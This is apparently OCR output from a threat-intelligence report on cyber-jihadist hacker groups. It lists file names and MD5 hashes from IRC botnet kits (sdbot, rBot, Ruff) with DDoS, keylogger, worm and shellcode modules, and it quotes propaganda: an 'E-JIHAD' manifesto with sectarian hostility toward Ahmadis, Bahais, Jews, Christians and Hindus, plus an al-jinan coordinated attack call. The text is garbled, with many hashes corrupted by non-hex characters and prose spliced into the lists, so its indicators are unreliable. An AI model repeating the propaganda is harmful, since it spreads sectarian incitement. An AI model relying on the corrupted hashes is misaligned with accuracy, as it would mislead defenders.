7e10de898ecd175a61a0dbfb12185c2a 
bio.h 
ce7243ecaa4b719218elbf752adfObed 
blowfish.h 
d49e3298bc64a6e465ed7718f564d8af 
bn.h 
b37a3ef0588ce34e0c63a5274aa44961 
buffer.h 356a812a4ffc0968b57ac95e7a63ab78 
cast.h 
96116e52361c2d0300342bfb6903a3bd 
comp.h 
0c90612a2a019eaef34bdbcc66a021b8 
conf.h 
38754a66c81b8f8b8590ed04b78d161d 
conf _api.h 
844d6a3830cb086ca59f131b1484d44b 
crypto.h 3bb8443f7f07e9234e96ec9579f090d0 
des.h 
0d6c580e72b14b714df7ae5f5318fb3f 
dh.h 
f9a01lc2ca0be5ead86ea26fd6574c2b4 
dsa.h 
665bdb1458242049a166edf3acd7170b 
dso.h 
4071b80cdab58b3fceaa958cO0ccdce46 
ebcdic.h b39613d8ce01e224ae72baa0246892e7 
engine.h 9834177eba2e98bd0f5381e74c2d3d5f 
err.h 
e9fa3cc5d24d8f10e18490856f4da054 
evp.h 
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620990a191df1ca247387f09c06f3b3c 
e _os.h 
62fbb35194165d3a5cb3d10e75aaa818 
e _os2.h 
784f6a58114c353b8e6f3a7787065cf3 
hmac.h 
b660alb6e6d396efcbdcf6412e93cb93 
idea.h 
fdc6éd4d55fed4dbbf381e80ab275318b 
Ihash.h 
5d5084cdce6d7bc60dc400f7d4faaccf 
md2.h 
4bf98d5033c334181483471c86e38267 
md4.h 
37af532a0408e1f9dd470374c52aeb87 
md5.h 
32c0cc65f2d457e9c0302b6e14233424 
mdc2.h 
2d9994df4b22705c60dd3f4bf242a7cl 
objects.h 
4187608d042df711837945991109f9fc 
obj _mac.h 
2e39e6bffb0O5ddbadb58aedc947f741f 
openssiconf.h 
1356dbc2305c7ba93decedla3e45alc2 
opensslv.h 
83a195ad2b394633f9d8ec69631a51lac 
pem.h 
c679bc0909305501723b0badf24c02be 
pem2.h 
2aee9bcf129f9962f3afaed608385850 
pkcs12.h 779cf7c87331535dfd5bf69a97b2fb3d 
pkcs7.h 
0d668a62e9c4a7c6ab6d9eb61f6e5c685 
rand.h 
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27d59b95a7eba54a99fd862039f4dff0 

rc2.h 

0d488e28bb20ff3788fe8c52133d1cfb 

rc4.h 

1c5b8415fc3cecfcc6a5359eccbd5dbd 

rc5.h 

94932666f36526419623555f90ab050a 
ripemd.h 350da6b77dcb285c59c78ce/671d2873 
rsa.h 

fd6cc4c4072d3b43ba8c8d62cca229bc 
rsaref.h 58fd3f7f75cb5841387a529b888eff7b 
safestack.h 
a4174efaacdbdcb936dea701193bc8f3 

sha.h 

d35627cd8cef90002563554a8d891c84 

ssl.h 

73ef4c68b58632f2f2b55e750b7ee06d 

ssl2.h 
ddce87b1la7e4af3aa35ca8ab665db6eb0 
ssl23.h 
71ae764cc97086829353194e4d9ff2e9 

ssl3.h 

e04e9f4F267129548c0e59fb144cd9bb 
stack.h 
81e9f97755996e1711e81aac115a33bd 
symhacks.h 
736e542efdfc7d21535a6ff8b3c03a45 

tls1.h 
d1c9de5aad2c0490825c2e1885a7e098 
tmdiff.h 8b6éb6f8df660f682d29b153cfe760674 
txt _db.h 
730e334f531c6a0ac0ae95e252c53f64 
x509.h 
3d93e919f45a81357b4b97dfa0f84155 
x509v3.h 81671fe50ed0f46bd427efbe1387844d 
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x509 __vfy.h 
a1954b5542b923971a40f046cbd4celc 
advscan.cpp 
fccc89bb22afb59736cc51797f3480ef 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
d43d28999a7006136a2b1f423bfeedeb 
configs.h 
303d3467069b1daf4d3886cdbb16abde 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 


1cd0adeb14bddO0dcbc3fe66a5fe2fed9 
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crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 


dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 


dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
e€9548b20f8d3d955969a8b515b426db4 


ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 


ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
d2ef4a3a60c60f33453c9b55a920f8c2 
download.cpp 

664845639 Laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 


ehandler.h 


12329 


3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
advscan.cpp 
fc3263145749deac7e2b6064519ba558 
advscan.h 
2589adb7d502f93c0d7d6724c7d81039 
aliaslog.cpp 
d60195a5148165141d045628f82671e1 
aliaslog.h 
5ab9c4b1902efad266b94b7930fb3ec7 
autostart.cpp 
09e282ede5d3f5cb74fdc11f42a4aaaa 
autostart.h 
f4fbe0c8b65385e430a777691ff7aace 
avirus.cpp 
90230d9aef62be4cef439832c0fe54ce 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
config.h 324717b5al13f23bac9ab8ac31lac8decc 
dcom.cpp 64fa33eaa2a9de04bcfl1dd59f20e852 
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dcom.h 
b2792e423f3ec732793723d53a0e12c8 
Defines.h 
6ae1532b45d10ce20e821fd69497b65c 
dns.cpp 
9024084fc54bb1cc479f256427332269 
dns.h 
ab2c466be14b5bdc7926d3e51ae2d10f 
download.cpp 
ac15371ba98b7e270dca3f9be3clbafd 
download.h 
187868409ecd324a855187414b397167 
driveinfo.cpp 
61489a2a37e1c3cdb6990d6b2f5916b4 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 


extern.h 70f27e8c3747f5da79c608cae2a94429 


fphost.cpp 
cb92claOcdada8afd7b92bdbb8650885 


fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp dc08e7206529f1db44355837bf18d326 


ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
baef36d4baf239dfd7d04b8971e7c438 
hostauth.cpp 
b55c6c608ab00008ec2c003c00353f90 
hostauth.h 
a5c89d3564e47d616ab4e64920a68d96 
httpd.cpp 
a3e77470f9c5daeba521a95ca0743f3e 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
70fc604da1812fca684b701a4e500222 
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icmpflood.h 
4462c6318220648820316848deb124fd 
identd.cpp 
flad766874468961407ae58418b1e900 
identd.h d59ab0522f735c3d29ffd032870e522f 
Includes.h 
78a62c721625b798a7cfe7dd45c7d8e4 
irc send.cpp 
76ec2b840db2701d00d0f75675555a8e 
irc _send.h 
65e70187da5c1166002c32a86a808194 
loaddll.cpp 
e6b0cc2638b8dcec4b263bd3521bd253 
loaddll.h 
d91dbc62cbb743d0d5ceea7527db8450 
misc.cpp 01613e25c0223581028459f71800974a 
misc.h 
ea5b8eb52a7124b69d2ccfb4e1319df7 
ms04 007 _asnl.cpp 
2a853c9d10336d329d45043a0ff4ccle 
ms04 _007 _asnl.h 
9ba0297d16535978fa6341a6633b7e35 
net.cpp 
9c383b2d4e6517a85ce84d3c69ef4e39 
net.h 
Obcae316c7ad0e800dd1758880a25acf 
netapi.cpp 
0c6064856095ed180049c816c7d60063 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netheaders.h 
dce3ff7f1lb3f5e902e6a7485d174c287 
netutils.cpp 
7ce06dda762d5706fce5eea2e38c55bf 
netutils.h 
82656db154a96c47d74069f4bccd24e5 
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"JIHAD is the term used for struggle against evil. Electronic jihad or simply, E-JIHAD, is 
the jihad in cyberspace against all the propagandas and false allegations against the message 
of truth. E-JIHAD is the struggle in cyber space against all false and evil disciplines, ideology 
and forces of evil. Have you ever think what is the need of army? To defend the freedom and 
liberty of a territory and defend it from the attacks of evil intruders. similarly , E-jihad is the 
battle in the field of cyber space, against all false believes, and to defend the truth against 
the false and mean propagandas and cults. It is as necessary as a regular army, to defend the 
ideological borders of a nation. It is said, “ itis not the gun, it is man behind the gun “. Do you 
ever think what makes a “man “? Nothing, but just the faith and ideology. Without faith and 
ideology, there is no man and definitely , we then have gun, but without any man ." 


These are the tips provided for "defending the ideological borders" : 


- They have created anti-Islamic web sites, which are full of everything except the truth. 
They are full of mean and vulgar allegations against our HOLY QURA’AN, HOLY PROPHAT 
MOHAMMAD (PEACE BE UPON HIM) and our teachings. We must defend our teachings and 
fight against the evils. We have to create Islamic web sites, eGroups, Forums, Message 
boards, & we must support our Mujahideen brothers in Iraq, Afghanistan, Palestine, Kashmir 
and elsewhere. 


- Many non-Muslims specially jews, Christians and hindus are working in different web 
groups and communities (like yahoo groups and msn communities) and spreading propa- 
ganda against us Muslims. There is a strong need to join such groups and try to refute them. 
At the moment, the cyber space is free of their opponents. Try to join and refute them, defend 
your HOLY TEACHINGS OF ISLAM and bring before everyone, nothing but just the truth. 


- One of the most dangerous enemies is those who impersonate themselves as a Muslims but 
they are not Muslims infact. They are Islamic cults. They are usually qadyanis/ahmadis/mirzais 
and bahais. some are jews and christians. They are all non Muslims but they impersonate as 
a Muslim and try to misguide others. They are spreading non-lslamic believes. It needs to be 
taken care of, we have to fight them. Otherwise, you can imagine how disastrous this situation 
can be for Muslims. These culprit groups even tried to spread a copy of their teachings in the 
name of HOLY QURA’ AN. but ALLAH has promised that HE will keep HOLY QURA’AN preserved. 
That’s why, their attempt failed. What is our job? We must fight with these muslim cults and 
have to tell others the difference between Muslims and muslims cults. 


- You can even make your own groups and communities to send mails having Muslim 
news and Islamic teachings. It is a time convenient method because if you have 500 members 
in your group, by sending a single mail in the group, your message will be in the inboxes of 
500 users, and it takes hardly 1-2 minutes. Isn’t it a time saving technique? 


- Many non-Muslim specially Americans, Israelis and Indian hackers always attack our 
web sites, which are refuting their falsehood and spreading the truth of Islam, the truth that is 
the only reality. To defend us against such “satanic groups “, we have to organize teamwork, 
consists of team of Muslim Hackers. Diamond cuts a diamond, to fight with hackers, we need 
hackers who will defend our sites and make it sure to convey uninterrupted messages to 
refute the evil and to spread the truth. 
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passwd.h 76459e9d8a479f2ef8ca2al1a6737f580 
processes.cpp 
b66c0665216dc2288bcf8fff01786931 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
rndnick.cpp 
fd6bd05f136b6c6192b08e09455942dc 
rndnick.h 
26e98f60f0f8b3392elea0b4ad0e247d 
scan.cpp bc960d7eb12a521c33b321173a/7fbd3b 
scan.h 

sdbot05b.cpp 
a27d0fd77927d22951e273459599061c 
sdbot05b.dsp 
€3051b2536163fee923162ef32846d40 
sdbot05b.dsw 
1lac2f28922917d1f0ae90ea17f13241 
sdbot05b.h 
c81bdbc19e13c93fce3230bab69f6f83b 
sdbot05b.ncb 
66f089b55369e7e94582e85ca2ac7efd 
sdbot05b.opt 
4a1147ba31b0504b5f0fa55f5f0d5f5c 
secure.cpp 
821dc62739e2cee603fdeb342cea92ee 
secure.h 91d9c721labbf6c860b7f59b7580e8451 
shellcode.cpp 
007902c34ed313a34c47397e84fdc434 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
sniffer.cpp 
d65cf47372e789930ff139dd9b459635 
sniffer.h 
5eebe93de4e03bf0bb118e35997743a9 


socks.cpp 
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adcb2d40f1bd49d73e6b15b6ce4c69dd 
socks.h 
b103f307ff02cd98fe2bfbecbd19c011 
synflood.cpp 
142e1970540de2d63ac5dda8188208ae 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
taskhider.cpp 
177cd3592dbc89c7676d4e7b7a5921F4 
taskhider.h 
389c143483d51daec2eb37fdb78744al 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 

f1980d02582ebdffcd7 7fld4ee3522fd 
tftpd.h 
b187f7ba95f4d498138c6d42607c6929 
threads.cpp 
3e4e79fce663cf7a6e67f8f3de90acla 
threads.h 
71d97ecb2fb1129abe3ffd979193d1laf 
visit.cpp 
9eb5e0e50f7a87c7d8d1c85cc32adc4e 
visit.h 
5ffab31leb3db2a5c000bd789b4f46025 
vnc.cpp 
73a90cb08432538a4440cda8efb7 96ff 
vnc.h 
76734009998943bb064222c5c3b4c59e 
netlog.dll 
81051bcc2cflbedf378224b0a93e2877 
rb xdcc.sys 
d89578f94c8257bf7c2e06d7feal2f09 
Rouge-Bots Xdcc Commands.txt 
3672a58337aa709bf9739cf29e2eebe8 
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syseta.dll 
0f16f0269367c0032a11bb5402c7825d 


wina.sys e€9152e09807fb5alad6d6acb53579fa4 


winboot.dat 
3e4837b4dee35cc29a3bf15a7687b5dd 
winboot.exe 
99d6269f8bd6d2cl1cc41f271la6fcdd0e 
windate.exe 
acf71200bbf66f7031059b33e0807fd6 
winlog.exe 
1281e6bb86c87728c9366c1e4d39382d 
winnet.exe 
b5d0cde49aa9c59055006702bdcd751a 
CleanUp.bat 
9741¢c163502f68563bd7208206ecc348 


Ruff.dsp 3e302623b3a85e44818b5211817311d1 
Ruff.dsw 6702c9728b02eac0825dcefe6d7 3f60f 


advscan.cpp 
9cf4504f878bb25949bd7e82840d6d48 
aliaslog.cpp 
ac9b3c65e2ca5880738d4f80262c19b4 
autostart.cpp 
a072289807c00347f2d29b12dc39593b 
avirus.cpp 
4f1a0e103b0f249a429bb37a700d8d4b 
crc32.cpp 
1357bb3b875dd17bdd8d3dbd20c62b19 
crypt.cpp 
eeb0a8cab6d208bdd7d8f542f66fc77a 
dcc.cpp 
cbfc2fdac38ea6b0353e25ab5d42b2a8 
download.cpp 
7deec89267ef83a87c6e6b082ca367f6 
driveinfo.cpp 
9f76e€67725099533c0ae4841fef6777f 
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ehandler.cpp 
be4d5b1881362f85fa2666a4b29bfded 
fphost.cpp 
19eb7efc6aa31c01le7c4a9615e6e22c0 
ftpd.cpp 9cb3796117187ae716ce5b0a1e400551 
httpd.cpp 
1119dbd941dffa2ad805f4da878678a0 
ident.cpp 
0a6176b8975c171c98ac68f73ea3b6bb 

irc send.cpp 
€14416233afc52e48578de8ba2b9368e 
loaddlls.cpp 
03060b8e6c57030d465f09dcb21097cc 
massasn.cpp 
c5f9dcb0832d703d8b5e6c042c1d41e7 
misc.cpp 1771cddd7bbb0052d0ce6c15049e066f 
ms04 007 asnl.cpp 
9375458da857d4e6340f93790f9aab23 

net.cpp 

29fe97aaald90fe317ff5c73b34ed6b4 
netutils.cpp 
1d3ea9ee111a6a9136ba42fe69c64cea 
processes.cpp 
e€1738a490ffc2e502036093fcc7 8e3df 
random.cpp 
7073dbc83bc983bbbbf15668944a2684 
remotecmd.cpp 
5118d2f289c01lbblaeed2a0973bc7991 
rlogind.cpp 
57f0ff5be3ad8ff27749ec49aa711fcb 
rndnick.cpp 
98943d028112196d80217a44dbb8112f 
Ruff.cpp 3880f6c8dc3ed111e95be5e0d1fa0ele 
scan.cpp 8b67a7115653466a9af58a8al1f779617b 


secure.cpp 
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117d4d59cda957070b8a012d06ddc199 
session.cpp 
47dc46d058526cdeedb261a64b7a7101 
shellcode.cpp 
a0342d2efd788d1081a6020ee1b18fd8 
socks4.cpp 
99e38f7c089d735d233a890c0d1282b8 
sysinfo.cpp 
80fc32a0474f4bd306a6a890475c5489 
tftpd.cpp 
20c778cb10ea6c66a1469ed6403d784e 
threads.cpp 
566c4751c53acd0718473bdedf749e75 
veritas.cpp 
1c3a9ab54693f851092620eb72f49e92 
visit.cpp 
4ce152334ca9d2eee3930cffe3905ac6 
wildcard.cpp 
340178d366c6ee79ce31e7c9a26835e7 
configs.h 
912ffe280b1lbafad851le3ad48aceda42 
advscan.h 
ef14bfaal0257dc989f57fb467ef38e0 
aliaslog.h 
9e14e395003fa8fdde410bc39ee517de 
autostart.h 
6461e7f75d17f0349765b1653ed3cd55 
avirus.h 2c4499b6bf793b9d89219592ac7bad39 
crc32.h 
8307e0fddc042b67cc59e69c9116bbe0 
crypt.h 
444dc9930aee78144c1009f83462af0b 
dcc.h 
3fcc2120e0a8583alab7da025d458aeb 
defines.h 
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fa043b2e6d96e56b4d3fdbcf5c1308ad 
download.h 
5e4bc39c1a2a6679bb0792dd6918f025 
driveinfo.h 
0b27e3621884233b69dc89536a9c3c15 
ehandler.h 
5abeldf92190c740e225522782738ada 
externs.h 
0d6e84c43e953dba06ef589dccf7e514 
fphost.h 653477026c3bb9991fa2245f9f44fdef 
ftpd.h 
8082dae2c236f6078e05cd6d8aficf49 
ftppot.h cef91c81b916af0a892b7144f338bb3f 
functions.h 
1c46750dc10dbcb81d004e28e4265e42 
globals.h 
574760e04f58a3c92c1f3d4898092f8a 
httpd.h 
743e9el1be4d1f853dabc21e81c594890 
ident.h 
6577f56a343fb0992fdd5246916496c5 
includes.h 
27663e9498b16e5a90ba13926222fbdc 
irc _send.h 
ad9066771f87de477d0c048c05482fce 
loaddlls.h 
e9aec6b745ca7df4bd5b71a02b2967ef 
massasn.h 
9218d5e2b737c35a45d79a7d3907658a 
misc.h 
55bf22f43bbd690d4b7616f96163164e 
ms04 _007 _asnl.h 
32f84330ea3890cdbbfa930d056cbba2 
net.cpp 
9b513c0d64174d04f88700e91a42cdec 
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net.h 
5cfd3bcc14c21d1403ebff3c3e331152 
netutils.h 
108c6464220a70628da5c0e92641dfa9 
nicklist.h 
3b5ca620b18ece66360e6decb443fe82 
passwd.h c0a400fb2a76f8d336d0718cc36a72ea 
processes.h 
7006311c2996ef4800b9a7853eacc8df 
random.h 5d4c28e6ebf3cce49837c14a1a4a64f6 
remotecmd.h 
2bec406e59edce4127860f9be41549d4 
resource.h 
1c1f270cff1f6810011552a92d170737 
rlogind.h 
3ea4cOba86d00c84f98a9f6ad0d46d90 
rndnick.h 
810142d9331dadb84b348blaac71lea75 
Ruff.h 
c4ca5f4b2049168b767cdf571badcc4b 
scan.h 
c8ac42414bf133b143101bcacc434749 
secure.h €8062863ae01791c35a684449b554300 
session.h 
07c726751e47fa72e41e1ea2e6225a85 
shellcode.h 
22104b30ecb509d6646cbb15e35dcd4c 
socks4.h b06f0e3c923df590687ea6594a3d313b 
sysinfo.h 
c280a666fd618c80d344a6dda44afl ff 
tcpip.h 
15ee2c9a40e8cce353c2a8af5fab 7ff3 
tftpd.h 
O3bfbddc441a728c86b8dc57a27df760 
threads.h 
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b3e8027198760423578ce90b21ee1a20 
veritas.h 
e9e974838f1e71f88120ede9d5fffab4 
visit.h 
9ec7b7a62ff12c34401ace9756a50f13 
wildcard.h 
33d622a8aa9a465dc4f140394f4c5f73 
README.TXT 
5d6c323203b0525b2b6f24f9aebb9deb 
kcounterx.ICO 
a621f4fa65629344732ddc19f321997a 
recource.rc 
f52b186d75ee8e8f13cff1764840c93b 
advscan.cpp 
aa66d98ecb4f498624ab942f597cbaef 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
authors.txt 
5e70b680fcdafdbbd86d5b010dbb8b87 
autostart.cpp 
db2ce24b9bd3465f36b11f46f644a293 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
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capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
c98a12f271c0ee784673395994aa85a8 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
2edd2d034f248cbb84d9a40b3db4613d 
configs.h 
ed7925ac1b0cfc95flebb3377b7e5fa2 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
lcd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
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defines.h 
36039fdleleeblc9af7d0c75a677df98 
download.cpp 

664845639 lLaff5fbb872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 

6efOd2ffff7 5a9b4aflbe7159d6fc26e 
findfile.cpp 
741923bfd8307db16d7b9befa400f1d0 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp 55106e321966dd35d8aeb361d7dbaefa 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 

12342 


QE Fe Se OR Fre 
‘sane = DD 
SA aa = 
an 
= 


seu Z 


~s 


\ 


HaCKErS aL-AnSaR 


De steal) jliaii 5 Sta Soeiht 


ed 


_Ansar AL-Jihad Hackers Team and HaCKErS aLAnSaR 


Both of these are actually the same, and the group’s popularity comes from the [1]al-jinan.net 
and the [2]al-jinan.org Electronic Jinad campaigns, yes, the failed ones. The original message 
from Al-jinan’s first campaign back in 2006 : 


Objective : Will be updated automatically in the main program and the extra room in the 
conversation. Date : Saturday, 26 /8/2006 - Hours are from 6 pm to 10 Mecca Time - Jerusalem- 
Cairo. From 3 pm until 7 Time 05:00 Enter chat http: al-jinan.org/chat. Will work only half an 
hour before the attack. Leadership decided to use only the major programme in the attack, 
Litali follows : The programme operates in the same manner but more strongly Durrah, Member 
faced many problems in the modernization Durra because of their Alcockez, and the present 
quality, The programme is designed to automatically update speeds. 


Their "pitch" : 

"We note that our enemies Zionists have such groups in order to eliminate sites and sites of 
resistance Islamic profess. The notes on the Internet that many of the sites Mujahideen are 
taking place and the closure of sites and this immoral act of brotherhood pigs. Under such a 
senseless war on Lebanon and Palestine, the Zionists any target in any area. The factors that 
are responsible for targeting this will affect them and Ihabtahm and create terror in the hearts 
of God." 


_The Designer - Islamic HaCKEr 


A defacer going by the handle of The Designer - Islamic HaCKEr was a vivid hacktivist for a 
while, than switched handles and continued to deface spreading cyber jihadist PSYOPS such as 
the following message courtesy of one of his defacements : 


"Muslims are not Terrorists and U.S.A & Israel & europa are Terrorists. america and israel and 
europa they terrorists and we moslems not is terrorists . and It was hacked because you are 
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3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
3f9ced52788ae88dde6eca981414ccfl 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 
€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 3cOf647faf2ab75f9920775a315cf18d 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
a50c8d33ea9013fadd70388bbc46a98e 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
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f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7¢€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
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peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
33c66b63b2f222b77437a32ab7a115cb 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
psniff.cpp 
c4eb189f05d2a7ff6e52afeOcdab3bd17 


psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 2156552a4a12df16c2215b5208477a35 
rBot.dsp 22688a95ca24e6f8fbd4f8a606c006f2 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 


rBot.h 
6d17278915220464f9502b8ce5451f67 


rBot.ncb 1686e2714923f1862c10a45fae00bd39 
rBot.opt f8573a5250ece339b7aa2496ec561e53 
rBot.plg e4f236c5e34614315e0ad4df09a65bb0 


redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
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rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
sasser.cpp 
b6bd649b7e2516cb176b38c839993b44 
sasser.h f285bc67448b03f9d54a4ed5e62c58ea 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 
6236be771c0c88df937f75845a064f12 
120.aps 
e7b71a8496c5f0414094b0c839bc722a 
120.cpp 
17ff184e33e0b18bfdb2383d2aac5dc7 
120.dsp 
9f88c965fe7264c1067e87be2ba2d6f0 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
00a606e7ef559677c3d38666ba7 72269 
120.ico 
76685dfa5860561a421b7acc5f5c37fb 
120.ncb 
2d4f0b0a6bc7f12102970bb924cfbb24 
120.opt 
ed47a68f2bd9d7d9d237bbf38cfcbd83 
120.plg 
0c77cefc8895736ddf01b04534432b81 
120.rc 
78837375ecOc5a62dfe2ef30c6fc05el 
lreadme.txt 
1ea50a30e77726f7d71e43b91d40477b 
Adv.cpp 
ea5c7bc24b746caec7097ebbec14731b 
Adv.h 
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cf8516f8818d1fbd3665ba3023040d21 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
2cc8df47f7685e9624b0fe7f7ecf516a 
Conf.h 
